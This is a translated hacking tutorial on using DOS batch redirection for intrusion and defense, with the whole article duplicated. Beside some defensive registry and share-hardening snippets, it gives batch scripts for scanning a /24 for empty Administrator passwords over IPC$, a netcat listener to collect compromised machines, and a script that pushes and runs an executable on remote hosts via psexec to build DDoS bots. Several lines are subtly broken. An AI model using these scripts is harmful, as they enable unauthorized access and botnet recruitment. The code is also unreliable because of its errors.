===================;
The following is reprinted from www.bluedon.com
===================;
Application of Redirection Commands in Security Offense and Defense
Everyone knows that there is a command not commonly used under DOS - the redirection command. This little thing is very useful. This command can also be used under Win9x/ME/2000/XP. Flexibly using this command can bring great convenience to us - it will bring great convenience whether for intrusion, defense, or system application. Today let's take a look at several application examples of redirection commands in security.
I. Command Format
The standard input and output under DOS are usually carried out on the standard devices keyboard and display. Using redirection, the input and output can be conveniently redirected to disk files or other devices. Among them:
1. The greater-than sign ">" sends the command to a file or device, for example, printer>prn. When using the greater-than sign ">", some command outputs (such as error messages) cannot be redirected.
2. The double greater-than sign ">>" appends the command output to the end of the file without deleting the existing information in the file.
3. The less-than sign "<" obtains the input required by the command from a file instead of the keyboard.
4. The >& symbol redirects the output from one default I/O stream (stdout, stdin, stderr) to another default I/O stream. For example, command >output_file 2>&1 redirects all error messages during the command process from the screen to the standard file output. The values of the standard output are as follows:
Standard output Equivalent value
Stdin 0
Stdout 1
Stderr 2
Among them, 1 and 2 both create a file to store data; 4 may not be usable under DOS.
II. Output of Redirection Commands
Almost all commands send output to the screen. Even commands that send output to a drive or printer will display messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>). The greater-than sign can be used in most commands. For example, in the following command, the directory list generated by the dir command is redirected to the Dirlist.txt file: dir>dirlist.txt. If the Dirlist.txt file does not exist, the system will create it. If Dirlist.txt exists, the system will replace the information in the file with the output of the dir command.
To append the command output to the end of the file without losing any information in the file, use the double greater-than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. To redirect input to a command, just as you can send command output to a file or printer instead of the screen, you can obtain the input of the command from a file instead of the keyboard. To obtain input from a file, use the less-than sign (<). For example, the following command will obtain the input of the sort command from the List.txt file: sort
III. Application Examples
1. Locking/Unlocking the Registry
Everyone knows that if the DWORD value "Disableregistrytools" in the branch HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\sys_tem (remove "_") is "1", the registry can be locked, so others cannot use the registry editor. Using the redirection command under DOS, the registry can be locked/unlocked, which is very convenient.
Open the Notepad program, create a new text file, and enter the following content:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo >>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
Save it as a batch file with the.bat extension, and clicking this file will lock the registry!
In the above command, echo is the echo command under DOS. Adding the "@" prefix character in front of it means that this line will not be displayed in the command line or DOS when executed. If you want to see the execution process of the program, remove the "@". When writing the above code, you should pay attention that "REGEDIT4" in the first line must be in uppercase letters, and there is no space between "echo" and "." in the second line. The content generated by ">>" will be appended to the file behind it. Adding deltree /y 123.reg at the last line of the file can delete the 123.reg file without confirmation.
To unlock the registry, you can edit this batch file. Just change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, keep other content unchanged, save it as a.bat file, and clicking it will unlock the registry.
2. Recording the IP of Machines Logging in to 3389
Save the following content as 3389IP.bat:
time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer
Run 3389IP.bat, and then view the log.log file to see the IP of the machine logging in to 3389. Isn't it very convenient?
3. Restoring DOS Real Mode
Everyone knows that some malicious web pages will modify the registry of the viewer. Among various means, modifying the registry to make DOS real mode unavailable is one of the tricks. There are many ways to restore DOS real mode. Using a batch file combined with the redirection command is a relatively special trick, which is shared with you here.
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo >>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
Save it as a batch file with the.bat extension, and clicking this file will restore DOS real mode, and those DOS applications can be used again.
4. Waiting for the Shepherd Machine to Come
Is it very hard to find the shepherd machine every day? Using the redirection command and the batch file can let you find the shepherd machine simply! The method is to create a new text file with Notepad and enter the following content:
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
Save it as a.bat file (you need to prepare an nc.exe file in advance, which is the main program of the network fault event detection software Netcat), and then after running this program, you just wait for the shepherd machine to come to you actively! If you are lucky, 10 per day is not a problem.
5. Quick Empty Connection
An empty connection is a session established with the server without trust, in other words, it is an anonymous access to the server. Using the command net use \IP\ipc$ "" /user:"" can simply establish an empty connection with the target (requires the target to open IPC$). Using the redirection command and the for command can quickly make empty connections to a Class C network segment and save the results in a file for your analysis. The method is to edit a file with the following content with Notepad:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt
Save the batch file as.bat and run it. The function of this batch file is to sequentially try to establish an ipc$ connection with the account administrator and empty password for the 254 ips in the specified Class C network segment. If successful, the result will be recorded in test.txt. This realizes the NT weak password scanning function! Among them, the function of the for command is to execute a specific command for each file in a group of files, that is, a series of commands can be generated with the specified loop range. The format of the For command is: FOR %variable IN (set) DO command , and the specific meaning:
%variable: Specify a single letter replaceable parameter.
(set): Specify one or a group of files. Wildcards can be used.
command: Specify the command to be executed for each file.
command-parameters: Specify parameters or command line switches for a specific command.
When using the FOR command in the batch file, use %%variable instead of %variable when specifying the variable. The variable name is case-sensitive, so %i is different from %I.
6. Forbidding Empty Connection
The existence of empty connections has certain dangers, so it is better to forbid it! The method is to enter net share to view the local shared resources, and then enter the following commands to delete the shares:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are drives such as e, f, etc., they can be deleted in the same way)
Then create a new text file with Notepad and enter the following content:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo >>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
Save it as a batch file with the.bat extension, and clicking this file will forbid the empty connection.
7. Scanning All Computers Connected to This Machine with TCP Protocol
Scanning the ports of your own computer, finding that special ports are open, can check for trojans. Moreover, using the following batch file can also record the IP addresses of all computers connected to this machine with TCP protocol. The content of this.bat file is as follows:
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
In this way, not only the IP of the other party can be recorded, but also the time and date, which is convenient for you to view.
8. Automatically Obtaining DDoS Shepherd Machines
DDoS is the abbreviation of Distributed Denial of Service, which means distributed denial of service attack. It refers to using client/server technology to combine multiple computers as attack platforms to launch DoS attacks on one or more targets, thereby multiplying the power of denial of service attacks. Usually, the attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs, which have been installed on many computers on the Internet. When the agent program receives the instruction, it launches the attack. Using client/server technology, the master program can activate the operation of hundreds or thousands of agent programs in a few seconds.
Although it is not recommended to use DDoS to attack, it is necessary to master the technology. But how to obtain the shepherd machines for DDoS attack? Saving the following content as the ok.bat file can achieve the purpose:
@echo off
echo Automatically Obtain DDoS Shepherd Machines
for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
copy %1 \%i\admin$\sysytem32
if errorelevel 0 goto success
psexec -d \%i c:\winnt\sys_tem(remove "_")32%1
net user \%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo Shepherd Machine:%i>>success.txt
echo Username:%j>>success.txt
echo Password:%k>>success.txt
echo ------------------------------>>success.txt
The usage method is ok.bat *.exe host.txt, where the format of host.txt is: ip administrator password. Okay, give it a try. But don't use it for destruction.
In fact, the method mentioned in this article mainly uses batch files and related commands. The redirection command is just a "connector" playing a connecting role in it, but its contribution is also great, so we should not forget the redirection command.
The following is reprinted from www.bluedon.com
===================;
Application of Redirection Commands in Security Offense and Defense
Everyone knows that there is a command not commonly used under DOS - the redirection command. This little thing is very useful. This command can also be used under Win9x/ME/2000/XP. Flexibly using this command can bring great convenience to us - it will bring great convenience whether for intrusion, defense, or system application. Today let's take a look at several application examples of redirection commands in security.
I. Command Format
The standard input and output under DOS are usually carried out on the standard devices keyboard and display. Using redirection, the input and output can be conveniently redirected to disk files or other devices. Among them:
1. The greater-than sign ">" sends the command to a file or device, for example, printer>prn. When using the greater-than sign ">", some command outputs (such as error messages) cannot be redirected.
2. The double greater-than sign ">>" appends the command output to the end of the file without deleting the existing information in the file.
3. The less-than sign "<" obtains the input required by the command from a file instead of the keyboard.
4. The >& symbol redirects the output from one default I/O stream (stdout, stdin, stderr) to another default I/O stream. For example, command >output_file 2>&1 redirects all error messages during the command process from the screen to the standard file output. The values of the standard output are as follows:
Standard output Equivalent value
Stdin 0
Stdout 1
Stderr 2
Among them, 1 and 2 both create a file to store data; 4 may not be usable under DOS.
II. Output of Redirection Commands
Almost all commands send output to the screen. Even commands that send output to a drive or printer will display messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>). The greater-than sign can be used in most commands. For example, in the following command, the directory list generated by the dir command is redirected to the Dirlist.txt file: dir>dirlist.txt. If the Dirlist.txt file does not exist, the system will create it. If Dirlist.txt exists, the system will replace the information in the file with the output of the dir command.
To append the command output to the end of the file without losing any information in the file, use the double greater-than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. To redirect input to a command, just as you can send command output to a file or printer instead of the screen, you can obtain the input of the command from a file instead of the keyboard. To obtain input from a file, use the less-than sign (<). For example, the following command will obtain the input of the sort command from the List.txt file: sort
III. Application Examples
1. Locking/Unlocking the Registry
Everyone knows that if the DWORD value "Disableregistrytools" in the branch HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\sys_tem (remove "_") is "1", the registry can be locked, so others cannot use the registry editor. Using the redirection command under DOS, the registry can be locked/unlocked, which is very convenient.
Open the Notepad program, create a new text file, and enter the following content:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo >>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
Save it as a batch file with the.bat extension, and clicking this file will lock the registry!
In the above command, echo is the echo command under DOS. Adding the "@" prefix character in front of it means that this line will not be displayed in the command line or DOS when executed. If you want to see the execution process of the program, remove the "@". When writing the above code, you should pay attention that "REGEDIT4" in the first line must be in uppercase letters, and there is no space between "echo" and "." in the second line. The content generated by ">>" will be appended to the file behind it. Adding deltree /y 123.reg at the last line of the file can delete the 123.reg file without confirmation.
To unlock the registry, you can edit this batch file. Just change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, keep other content unchanged, save it as a.bat file, and clicking it will unlock the registry.
2. Recording the IP of Machines Logging in to 3389
Save the following content as 3389IP.bat:
time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer
Run 3389IP.bat, and then view the log.log file to see the IP of the machine logging in to 3389. Isn't it very convenient?
3. Restoring DOS Real Mode
Everyone knows that some malicious web pages will modify the registry of the viewer. Among various means, modifying the registry to make DOS real mode unavailable is one of the tricks. There are many ways to restore DOS real mode. Using a batch file combined with the redirection command is a relatively special trick, which is shared with you here.
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo >>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
Save it as a batch file with the.bat extension, and clicking this file will restore DOS real mode, and those DOS applications can be used again.
4. Waiting for the Shepherd Machine to Come
Is it very hard to find the shepherd machine every day? Using the redirection command and the batch file can let you find the shepherd machine simply! The method is to create a new text file with Notepad and enter the following content:
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
Save it as a.bat file (you need to prepare an nc.exe file in advance, which is the main program of the network fault event detection software Netcat), and then after running this program, you just wait for the shepherd machine to come to you actively! If you are lucky, 10 per day is not a problem.
5. Quick Empty Connection
An empty connection is a session established with the server without trust, in other words, it is an anonymous access to the server. Using the command net use \IP\ipc$ "" /user:"" can simply establish an empty connection with the target (requires the target to open IPC$). Using the redirection command and the for command can quickly make empty connections to a Class C network segment and save the results in a file for your analysis. The method is to edit a file with the following content with Notepad:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt
Save the batch file as.bat and run it. The function of this batch file is to sequentially try to establish an ipc$ connection with the account administrator and empty password for the 254 ips in the specified Class C network segment. If successful, the result will be recorded in test.txt. This realizes the NT weak password scanning function! Among them, the function of the for command is to execute a specific command for each file in a group of files, that is, a series of commands can be generated with the specified loop range. The format of the For command is: FOR %variable IN (set) DO command , and the specific meaning:
%variable: Specify a single letter replaceable parameter.
(set): Specify one or a group of files. Wildcards can be used.
command: Specify the command to be executed for each file.
command-parameters: Specify parameters or command line switches for a specific command.
When using the FOR command in the batch file, use %%variable instead of %variable when specifying the variable. The variable name is case-sensitive, so %i is different from %I.
6. Forbidding Empty Connection
The existence of empty connections has certain dangers, so it is better to forbid it! The method is to enter net share to view the local shared resources, and then enter the following commands to delete the shares:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are drives such as e, f, etc., they can be deleted in the same way)
Then create a new text file with Notepad and enter the following content:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo >>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
Save it as a batch file with the.bat extension, and clicking this file will forbid the empty connection.
7. Scanning All Computers Connected to This Machine with TCP Protocol
Scanning the ports of your own computer, finding that special ports are open, can check for trojans. Moreover, using the following batch file can also record the IP addresses of all computers connected to this machine with TCP protocol. The content of this.bat file is as follows:
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
In this way, not only the IP of the other party can be recorded, but also the time and date, which is convenient for you to view.
8. Automatically Obtaining DDoS Shepherd Machines
DDoS is the abbreviation of Distributed Denial of Service, which means distributed denial of service attack. It refers to using client/server technology to combine multiple computers as attack platforms to launch DoS attacks on one or more targets, thereby multiplying the power of denial of service attacks. Usually, the attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs, which have been installed on many computers on the Internet. When the agent program receives the instruction, it launches the attack. Using client/server technology, the master program can activate the operation of hundreds or thousands of agent programs in a few seconds.
Although it is not recommended to use DDoS to attack, it is necessary to master the technology. But how to obtain the shepherd machines for DDoS attack? Saving the following content as the ok.bat file can achieve the purpose:
@echo off
echo Automatically Obtain DDoS Shepherd Machines
for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
copy %1 \%i\admin$\sysytem32
if errorelevel 0 goto success
psexec -d \%i c:\winnt\sys_tem(remove "_")32%1
net user \%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo Shepherd Machine:%i>>success.txt
echo Username:%j>>success.txt
echo Password:%k>>success.txt
echo ------------------------------>>success.txt
The usage method is ok.bat *.exe host.txt, where the format of host.txt is: ip administrator password. Okay, give it a try. But don't use it for destruction.
In fact, the method mentioned in this article mainly uses batch files and related commands. The redirection command is just a "connector" playing a connecting role in it, but its contribution is also great, so we should not forget the redirection command.

